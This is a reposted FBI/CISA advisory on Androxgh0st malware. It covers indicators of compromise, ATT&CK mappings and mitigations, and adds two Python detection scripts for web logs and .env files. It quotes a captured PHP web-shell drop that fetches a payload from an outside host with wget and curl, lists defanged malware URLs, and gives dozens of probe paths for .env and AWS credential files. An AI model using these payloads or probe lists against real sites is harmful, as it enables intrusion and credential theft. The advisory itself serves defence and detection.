Known Indicators of Compromise Associated with Androxgh0st Malware

SUMMARY

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) to disseminate known indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) associated with threat actors deploying Androxgh0st malware. Multiple, ongoing investigations and trusted third party reporting yielded the IOCs and TTPs, and provided information on Androxgh0st malware’s ability to establish a botnet that can further identify and compromise vulnerable networks.

The FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of cybersecurity incidents caused by Androxgh0st infections.

Download the PDF version of this report:

AA24-016A Known Indicators of Compromise Associated with Androxgh0st Malware (PDF, 576.40 KB)

For a downloadable copy of IOCs, see:

AA24-016A STIX XML (XML, 45.81 KB)
AA24-016A STIX JSON (JSON, 39.87 KB)

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques with corresponding mitigation and/or detection recommendations. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Overview

Androxgh0st malware has been observed establishing a botnet [T1583.005] for victim identification and exploitation in target networks. According to open source reporting[1], Androxgh0st is a Python-scripted malware [T1059.006] primarily used to target .env files that contain confidential information, such as credentials [T1552.001] for various high profile applications (i.e., Amazon Web Services [AWS], Microsoft Office 365, SendGrid, and Twilio from the Laravel web application framework). Androxgh0st malware also supports numerous functions capable of abusing the Simple Mail Transfer Protocol (SMTP), such as scanning [T1046] and exploiting exposed credentials [T1078] and application programming interfaces (APIs) [T1114], and web shell deployment [T1505.003].

Targeting the PHPUnit

Androxgh0st malware TTPs commonly involve the use of scripts, conducting scanning [T1595] and searching for websites with specific vulnerabilities. In particular, threat actors deploying Androxgh0st have been observed exploiting CVE-2017-9841 to remotely run hypertext preprocessor (PHP) code on vulnerable websites via PHPUnit [T1190]. Websites using the PHPUnit module that have internet-accessible (exposed) /vendor folders are subject to malicious HTTP POST requests to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php uniform resource identifier (URI). This PHP page runs PHP code submitted through a POST request, which allows the threat actors to remotely execute code.

Malicious actors likely use Androxgh0st to download malicious files [T1105] to the system hosting the website. Threat actors are further able to set up a fake (illegitimate) page accessible via the URI to provide backdoor access to the website. This allows threat actors to download additional malicious files for their operations and access databases.

Laravel Framework Targeting

Androxgh0st malware establishes a botnet to scan for websites using the Laravel web application framework. After identifying websites using the Laravel web application, threat actors attempt to determine if the domain’s root-level .env file is exposed and contains credentials for accessing additional services. Note: .env files commonly store credentials and tokens. Threat actors often target .env files to steal these credentials within the environment variables.

If the .env file is exposed, threat actors will issue a GET request to the /.env URI to attempt to access the data on the page. Alternatively, Androxgh0st may issue a POST request to the same URI with a POST variable named 0x[] containing certain data sent to the web server. This data is frequently used as an identifier for the threat actor. This method appears to be used for websites in debug mode (i.e., when non-production websites are exposed to the internet). A successful response from either of these methods allows the threat actors to look for usernames, passwords, and/or other credentials pertaining to services such as email (via SMTP) and AWS accounts.

Androxgh0st malware can also access the application key [TA0006] for the Laravel application on the website. If the threat actors successfully identify the Laravel application key, they will attempt exploitation by using the key to encrypt PHP code [T1027.010]. The encrypted code is then passed to the website as a value in the cross-site forgery request (XSRF) token cookie, XSRF-TOKEN, and included in a future GET request to the website. The vulnerability defined in CVE-2018-15133 indicates that on Laravel applications, XSRF token values are subject to an un-serialized call, which can allow for remote code execution. In doing so, the threat actors can upload files to the website via remote access.

Apache Web Server Targeting

In correlation with CVE-2021-41773, Androxgh0st actors have been observed scanning for vulnerable web servers [T1595.002] running Apache HTTP Server versions 2.4.49 or 2.4.50. Threat actors can identify uniform resource locators (URLs) for files outside the document root through a path traversal attack [T1083]. If these files are not protected by the Apache “Require all denied” configuration and Common Gateway Interface (CGI) scripts are enabled, this may allow for remote code execution.

If threat actors obtain credentials for any services using the above methods, they may use these credentials to access sensitive data or use these services to conduct additional malicious operations. For example, when threat actors successfully identify and compromise AWS credentials from a vulnerable website, they have been observed attempting to create new users and user policies [T1136]. Additionally, Androxgh0st actors have been observed creating new AWS instances to use for conducting additional scanning activity [T1583.006].

INDICATORS OF COMPROMISE (IOCs)

Based on investigations and analysis, the following requests are associated with Androxgh0st activity:

  • Incoming GET and POST requests to the following URIs:

    • /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
    • /.env
  • Incoming POST requests with the following strings:

    • [0x%5B%5D=androxgh0st]
    • ImmutableMultiDict([('0x[]', 'androxgh0st')])

In both previously listed POST request strings, the name androxgh0st has been observed to be replaced with other monikers.

Additional URIs observed by the FBI and a trusted third party used by these threat actors for credential exfiltration include:

  • /info
  • /phpinfo
  • /phpinfo.php
  • /?phpinfo=1
  • /frontend_dev.php/$
  • /_profiler/phpinfo
  • /debug/default/view?panel=config
  • /config.json
  • /.json
  • /.git/config
  • /live_env
  • /.env.dist
  • /.env.save
  • /environments/.env.production
  • /.env.production.local
  • /.env.project
  • /.env.development
  • /.env.production
  • /.env.prod
  • /.env.development.local
  • /.env.old
  • /<insert-directory>/.env
    • Note: the actor may attempt multiple different potential URI endpoints scanning for the .env file, for example /docker/.env or /local/.env.
  • /.aws/credentials
  • /aws/credentials
  • /.aws/config
  • /.git
  • /.test
  • /admin
  • /backend
  • /app
  • /current
  • /demo
  • /api
  • /backup
  • /beta
  • /cron
  • /develop
  • /Laravel
  • /laravel/core
  • /gists/cache
  • /test.php
  • /info.php
  • //.env
  • /admin-app/.env%20
  • /laravel/.env%20
  • /shared/.env%20
  • /.env.project%20
  • /apps/.env%20
  • /development/.env%20
  • /live_env%20
  • /.env.development%20

Targeted URIs for web-shell drop:
  • /.env/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //lib/phpunit/phpunit/Util/PHP/eval-stdin.php
  • //lib/phpunit/src/Util/PHP/eval-stdin.php
  • //lib/phpunit/Util/PHP/eval-stdin.php
  • //new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //phpunit/phpunit/Util/PHP/eval-stdin.php
  • //phpunit/src/Util/PHP/eval-stdin.php
  • //phpunit/Util/PHP/eval-stdin.php
  • //protected/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/evalstdin.php
  • //vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
  • //vendor/phpunit/src/Util/PHP/eval-stdin.php
  • //vendor/phpunit/Util/PHP/eval-stdin.php
  • //wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /admin/ckeditor/plugins/ajaxplorer/phpunit/src/Util/PHP/eval-stdin.php
  • /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /api/vendor/phpunit/phpunit/src/Util/PHP/Template/eval-stdin.php
  • /lab/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /laravel_web/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /laravelao/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /lib/phpunit/phpunit/Util/PHP/eval-stdin.php
  • /lib/phpunit/phpunit/Util/PHP/eval-stdin.php%20/lib/phpunit/src/Util/PHP/eval-stdin.php
  • /lib/phpunit/src/Util/PHP/eval-stdin.php
  • /lib/phpunit/Util/PHP/eval-stdin.php
  • /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /libraries/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /phpunit/phpunit/Util/PHP/eval-stdin.php
  • /phpunit/phpunit/Util/PHP/eval-stdin.php%20/phpunit/src/Util/PHP/evalstdin.php
  • /phpunit/src/Util/PHP/eval-stdin.php
  • ./phpunit/Util/PHP/eval-stdin.php
  • /phpunit/Util/PHP/eval-stdin.php%20/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php.dev
  • /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
  • /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php%20/vendor/phpunit/src/Util/PHP/eval-stdin.php
  • /vendor/phpunit/src/Util/PHP/eval-stdin.php
  • /vendor/phpunit/Util/PHP/eval-stdin.php
  • /vendor/phpunit/Util/PHP/eval-stdin.php%20
  • /phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

An example of attempted credential exfiltration through (honeypot) open proxies:

POST /.aws/credentials HTTP/1.1
host: www.example.com
user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
accept-encoding: gzip, deflate
accept: */*
connection: keep-alive
content-length: 20
content-type: application/x-www-form-urlencoded

0x%5B%5D=androxgh0st

An example of attempted web-shell drop through (honeypot) open proxies:

GET http://www.example.com/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
host: www.example.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.76
accept-encoding: gzip, deflate
accept: */*
connection: keep-alive
x-forwarded-for: 200.172.238.135
content-length: 279

<?php file_put_contents('evil.php',file_get_contents('hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt')); system('wget hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt -O evil.php;curl hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt -O evil.php'); ?>

Monikers used instead of Androxgh0st (0x%5B%5D=???):
  • Ridho
  • Aws
  • 0x_0x
  • x_X
  • nopebee7
  • SMTPEX
  • evileyes0
  • privangga
  • drcrypter
  • errorcool
  • drosteam
  • androxmen
  • crack3rz
  • b4bbyghost
  • 0x0day
  • janc0xsec
  • blackb0x
  • 0x1331day
  • Graber
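
The following is an added example, not part of the advisory, showing how the request-level indicators above (the eval-stdin.php and .env URIs, the 0x[] POST key, and the moniker list) can be matched against web server log lines. The tag names, the log regex, the trailing quoted request-body field (not present in standard combined logs; assumed here to come from a WAF or proxy that records bodies), and the sample IPs and timestamps are all constructed for this example.

```python
import re
from urllib.parse import parse_qs, unquote

# Indicator patterns built from the IOC section of the advisory. The value after
# 0x[] is known to change (Ridho, Aws, 0x_0x, ...), so the key name is the stable
# signal; the value is only reported for attribution.
WEBSHELL_URI_RE = re.compile(r"phpunit/.*Util/PHP/(Template/)?eval-?stdin\.php", re.IGNORECASE)
ENV_URI_RE = re.compile(r"(^|/)(\.env(\.[A-Za-z0-9_.-]+)?|live_env)$")
AWS_URI_RE = re.compile(r"/\.?aws/(credentials|config)$")
INFO_LEAK_URIS = {
    "/info", "/phpinfo", "/phpinfo.php", "/?phpinfo=1", "/_profiler/phpinfo",
    "/debug/default/view?panel=config", "/config.json", "/.json", "/.git/config", "/.git",
}
MONIKER_KEY = "0x[]"

# Apache/nginx combined log format. The body is not logged there, so the optional
# trailing quoted field is a constructed extension for this example (e.g. a WAF log).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+(?: "(?P<body>[^"]*)")?'
)


def normalize_uri(raw_uri):
    """URL-decode, drop an absolute-form scheme://host prefix, collapse repeated
    slashes and strip the trailing space that %20-suffixed IOC URIs decode to."""
    uri = unquote(raw_uri)
    uri = re.sub(r"^https?://[^/]+", "", uri)
    uri = re.sub(r"/{2,}", "/", uri)
    return uri.strip()


def classify_request(method, raw_uri, body=""):
    """Return the set of Androxgh0st indicator tags a single HTTP request triggers."""
    tags = set()
    uri = normalize_uri(raw_uri)
    path = uri.partition("?")[0]
    if WEBSHELL_URI_RE.search(path):
        tags.add("phpunit-eval-stdin")        # CVE-2017-9841 probe / web-shell drop
    if ENV_URI_RE.search(path):
        tags.add("env-file-probe")            # Laravel .env credential hunting
    if AWS_URI_RE.search(path):
        tags.add("aws-credential-probe")
    if uri in INFO_LEAK_URIS:
        tags.add("info-leak-probe")
    if body:
        form = parse_qs(body, keep_blank_values=True)   # decodes 0x%5B%5D to 0x[]
        if MONIKER_KEY in form:
            tags.add("moniker:" + (form[MONIKER_KEY][0] or "<empty>"))
        if "<?php" in body:
            tags.add("php-payload-in-body")   # PHP source submitted for eval
    return tags


def scan_log(lines):
    """Parse combined-format log lines; return (ip, method, uri, tags) for hits only."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify_request(m["method"], m["uri"], m["body"] or "")
        if tags:
            hits.append((m["ip"], m["method"], m["uri"], sorted(tags)))
    return hits


# Constructed sample log lines (IPs and timestamps invented), modelled on the
# advisory's honeypot captures and IOC URI list.
SAMPLE_LOG = [
    '203.0.113.10 - - [16/Jan/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512',
    '203.0.113.11 - - [16/Jan/2024:10:00:02 +0000] "POST /.aws/credentials HTTP/1.1" 404 0 "0x%5B%5D=androxgh0st"',
    '203.0.113.12 - - [16/Jan/2024:10:00:03 +0000] "POST /.env HTTP/1.1" 200 1320 "0x%5B%5D=Ridho"',
    '203.0.113.13 - - [16/Jan/2024:10:00:04 +0000] "GET //lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 0 "<?php file_put_contents(...); ?>"',
    '203.0.113.14 - - [16/Jan/2024:10:00:05 +0000] "GET /admin-app/.env%20 HTTP/1.1" 404 0',
    '203.0.113.15 - - [16/Jan/2024:10:00:06 +0000] "GET /debug/default/view?panel=config HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for ip, method, uri, tags in scan_log(SAMPLE_LOG):
        print(f"{ip} {method} {uri} -> {', '.join(tags)}")
```

Matching on the 0x[] key rather than its value is deliberate: the advisory states the value is swapped for other monikers, so the key is the stable signal and the value is only reported. Absolute-form request lines, doubled leading slashes and trailing %20 are normalized first because the URI list above contains all three forms, and a 404 on these probes is still worth alerting on since it shows the scanner has found the host.
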

Example malware drops through eval-stdin.php:

hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt
59e90be75e51c86b4b9b69dcede2cf815da5a79f7e05cac27c95ec35294151f4

hxxps://chainventures.co[.]uk/.well-known/aas
dcf8f640dd7cc27d2399cce96b1cf4b75e3b9f2dfdf19cee0a170e5a6d2ce6b6

hxxp://download.asyncfox[.]xyz/download/xmrig.x86_64
23fc51fde90d98daee27499a7ff94065f7ed4ac09c22867ebd9199e025dee066

hxxps://pastebin[.]com/raw/zw0gAmpC
ca45a14d0e88e4aa408a6ac2ee3012bf9994b16b74e3c66b588c7eabaaec4d72

hxxp://raw.githubusercontent[.]com/0x5a455553/MARIJUANA/master/MARIJUANA.php
0df17ad20bf796ed549c240856ac2bf9ceb19f21a8cae2dbd7d99369ecd317ef

hxxp://45.95.147[.]236/tmp.x86_64
6b5846f32d8009e6b54743d6f817f0c3519be6f370a0917bf455d3d114820bbc

hxxp://main.dsn[.]ovh/dns/pwer
bb7070cbede294963328119d1145546c2e26709c5cea1d876d234b991682c0b7

hxxp://tangible-drink.surge[.]sh/configx.txt
de1114a09cbab5ae9c1011ddd11719f15087cc29c8303da2e71d861b0594a1ba

MITRE ATT&CK TACTICS AND TECHNIQUES

See Tables 1-10 for all referenced threat actor tactics and techniques in this advisory.

Table 1: Reconnaissance

Technique Title | ID | Use
Active Scanning: Vulnerability Scanning | T1595.002 | The threat actor scans websites for specific vulnerabilities to exploit.

Table 2: Resource Development

Technique Title | ID | Use
Acquire Infrastructure: Botnet | T1583.005 | The threat actor establishes a botnet to identify and exploit victims.
Acquire Infrastructure: Web Services | T1583.006 | The threat actor creates new AWS instances to use for scanning.

Table 3: Initial Access

Technique Title | ID | Use
Exploit Public-Facing Application | T1190 | The threat actor exploits CVE-2017-9841 to remotely run hypertext preprocessor (PHP) code on websites via PHPUnit.

Table 4: Execution

Technique Title | ID | Use
Command and Scripting Interpreter: Python | T1059.006 | The threat actor uses Androxgh0st, a Python-scripted malware, to target victim files.

Table 5: Persistence

Technique Title | ID | Use
Valid Accounts | T1078 | The threat actor abuses the simple mail transfer protocol (SMTP) by exploiting exposed credentials.
Server Software Component: Web Shell | T1505.003 | The threat actor deploys web shells to maintain persistent access to systems.
Create Account | T1136 | The threat actor attempts to create new users and user policies with compromised AWS credentials from a vulnerable website.

Table 6: Defense Evasion

Technique Title | ID | Use
Obfuscated Files or Information: Command Obfuscation | T1027.010 | The threat actor can exploit a successfully identified Laravel application key to encrypt PHP code, which is then passed to the site as a value in the XSRF-TOKEN cookie.

Table 7: Credential Access

Technique Title | ID | Use
Credential Access | TA0006 | The threat actor can access the application key of the Laravel application on the site.
Unsecured Credentials: Credentials in Files | T1552.001 | The threat actor targets .env files that contain confidential credential information.

Table 8: Discovery

Technique Title | ID | Use
File and Directory Discovery | T1083 | The threat actor can identify URLs for files outside the root directory through a path traversal attack.
Network Service Discovery | T1046 | The threat actor uses Androxgh0st to abuse simple mail transfer protocol (SMTP) via scanning.

Table 9: Collection

Technique Title | ID | Use
Email Collection | T1114 | The threat actor interacts with application programming interfaces (APIs) to gather information.

Table 10: Command and Control

Technique Title | ID | Use
Ingress Tool Transfer | T1105 | The threat actor runs PHP code through a POST request to download malicious files to the system hosting the website.

MITIGATIONS

The FBI and CISA recommend implementing the mitigations below to improve your organization’s cybersecurity posture based on Androxgh0st threat actor activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

These mitigations apply to all critical infrastructure organizations and network defenders. FBI and CISA recommend that software manufacturers incorporate secure by design principles and tactics into their software development practices, limiting the impact of actor techniques and strengthening their customers’ security posture. For more information on secure by design, see CISA’s Secure by Design webpage.

The FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by actors using Androxgh0st malware.

  • Keep all operating systems, software, and firmware up to date. Specifically, ensure that Apache servers are not running versions 2.4.49 or 2.4.50. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems.
  • Verify that the default configuration for all URIs is to deny all requests unless there is a specific need for it to be accessible.
  • Ensure that any live Laravel applications are not in “debug” or testing mode. Remove all cloud credentials from .env files and revoke them. All cloud providers have safer ways to provide temporary, frequently rotated credentials to code running inside a web server without storing them in any file.
  • On a one-time basis for previously stored cloud credentials, and on an on-going basis for other types of credentials that cannot be removed, review any platforms or services that have credentials listed in the .env file for unauthorized access or use.
  • Scan the server’s file system for unrecognized PHP files, particularly in the root directory or /vendor/phpunit/phpunit/src/Util/PHP folder.
  • Review outgoing GET requests (via cURL command) to file hosting sites such as GitHub, pastebin, etc., particularly when the request accesses a .php file.
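
As an added example (not the advisory's own tooling) of the .env and file-system checks in the mitigations above, the following Python script flags live debug mode and stored cloud credentials in a Laravel .env file, lists PHP files under a web root that are absent from a deployment baseline, singles out PHPUnit's eval-stdin.php, and compares every file's SHA-256 against the drop hashes listed in this advisory. The key names SENDGRID_API_KEY and TWILIO_AUTH_TOKEN are assumed; the temporary web root and .env contents it builds are constructed sample data.

```python
import hashlib
import os
import tempfile

# SHA-256 hashes of the malware drops listed in this advisory.
KNOWN_DROP_HASHES = {
    "59e90be75e51c86b4b9b69dcede2cf815da5a79f7e05cac27c95ec35294151f4",
    "dcf8f640dd7cc27d2399cce96b1cf4b75e3b9f2dfdf19cee0a170e5a6d2ce6b6",
    "23fc51fde90d98daee27499a7ff94065f7ed4ac09c22867ebd9199e025dee066",
    "ca45a14d0e88e4aa408a6ac2ee3012bf9994b16b74e3c66b588c7eabaaec4d72",
    "0df17ad20bf796ed549c240856ac2bf9ceb19f21a8cae2dbd7d99369ecd317ef",
    "6b5846f32d8009e6b54743d6f817f0c3519be6f370a0917bf455d3d114820bbc",
    "bb7070cbede294963328119d1145546c2e26709c5cea1d876d234b991682c0b7",
    "de1114a09cbab5ae9c1011ddd11719f15087cc29c8303da2e71d861b0594a1ba",
}

# .env keys whose value is a long-lived cloud or API secret. AWS_*, MAIL_PASSWORD and
# APP_DEBUG are standard Laravel .env names; SENDGRID_API_KEY and TWILIO_AUTH_TOKEN are
# assumed names for the other services the advisory says the actors look for.
SECRET_KEYS = {"AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "SENDGRID_API_KEY",
               "TWILIO_AUTH_TOKEN", "MAIL_PASSWORD"}
PHPUNIT_UTIL_PHP = "vendor/phpunit/phpunit/src/Util/PHP"


def audit_env(env_text):
    """Return (line, key, reason) for .env settings the mitigations say must not be live."""
    findings = []
    for lineno, raw in enumerate(env_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        value = value.strip('"\'')
        if key == "APP_DEBUG" and value.lower() == "true":
            findings.append((lineno, key, "debug mode enabled on a live application"))
        elif key in SECRET_KEYS and value:
            findings.append((lineno, key, "stored credential: revoke, rotate, move to short-lived instance credentials"))
    return findings


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def audit_php_files(webroot, baseline):
    """Walk webroot and return (relative_path, reason) for files whose hash matches a
    known drop, for eval-stdin.php under the PHPUnit Util/PHP folder, and for any .php
    file absent from the deployment baseline (a set of forward-slash relative paths)."""
    findings = []
    for dirpath, _, filenames in os.walk(webroot):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, webroot).replace(os.sep, "/")
            if sha256_of(full) in KNOWN_DROP_HASHES:
                findings.append((rel, "SHA-256 matches a known Androxgh0st drop"))
            if not name.lower().endswith(".php"):
                continue
            if rel == PHPUNIT_UTIL_PHP + "/eval-stdin.php":
                findings.append((rel, "PHPUnit eval-stdin.php present under the web root (CVE-2017-9841)"))
            elif rel not in baseline:
                findings.append((rel, "PHP file not in deployment baseline"))
    return sorted(findings)


def build_demo_tree():
    """Create a constructed Laravel-style web root in a temporary directory."""
    root = tempfile.mkdtemp(prefix="androx-audit-")
    util = os.path.join(root, *PHPUNIT_UTIL_PHP.split("/"))
    os.makedirs(util)
    files = {
        os.path.join(root, "index.php"): "<?php echo 'hello'; ?>\n",
        os.path.join(util, "eval-stdin.php"): "<?php // placeholder standing in for the real PHPUnit file\n",
        os.path.join(util, "evil.php"): "<?php // constructed placeholder, not a real web shell\n",
        os.path.join(root, ".env"): (
            "APP_NAME=Demo\nAPP_DEBUG=true\n# comment\n"
            "AWS_ACCESS_KEY_ID=PLACEHOLDER_ACCESS_KEY\n"
            "AWS_SECRET_ACCESS_KEY=\"placeholder-secret\"\nMAIL_PASSWORD=\n"
        ),
    }
    for path, content in files.items():
        with open(path, "w") as fh:
            fh.write(content)
    return root


def run_demo():
    root = build_demo_tree()
    with open(os.path.join(root, ".env")) as fh:
        env_findings = audit_env(fh.read())
    php_findings = audit_php_files(root, baseline={"index.php"})
    return env_findings, php_findings


if __name__ == "__main__":
    env_findings, php_findings = run_demo()
    for lineno, key, reason in env_findings:
        print(f".env:{lineno} {key}: {reason}")
    for rel, reason in php_findings:
        print(f"{rel}: {reason}")
```

The baseline is the set of PHP paths your deployment is supposed to contain (for example, generated from the release artifact); anything else under the web root, and especially under vendor/phpunit/phpunit/src/Util/PHP, is what the mitigation above calls an unrecognized PHP file. An empty secret value (MAIL_PASSWORD= in the sample) is not reported, since the mitigation is about credentials that are actually stored.
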

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Tables 1-10).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

REPORTING

The FBI encourages organizations to report information concerning suspicious or criminal activity to their local FBI field office. With regards to specific information that appears in this CSA, indicators should always be evaluated in light of an organization’s complete security situation.

When available, each report submitted should include the date, time, location, type of activity, number of people, and type of equipment used for the activity, the name of the submitting company or organization, and a designated point of contact. Reports can be submitted to the FBI Internet Crime Complaint Center (IC3), a local FBI Field Office, or to CISA via its Incident Reporting System or its 24/7 Operations Center at [email protected] or (888) 282-0870.

RESOURCES

REFERENCES

  1. Fortinet – FortiGuard Labs: Threat Signal Report: AndroxGh0st Malware Actively Used in the Wild

ACKNOWLEDGEMENTS

Amazon contributed to this CSA.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. FBI and CISA do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI and CISA.

Original source: CISA, Known Indicators of Compromise Associated with Androxgh0st Malware.

Reposted by admin on January 22, 2024, 10:51 PM.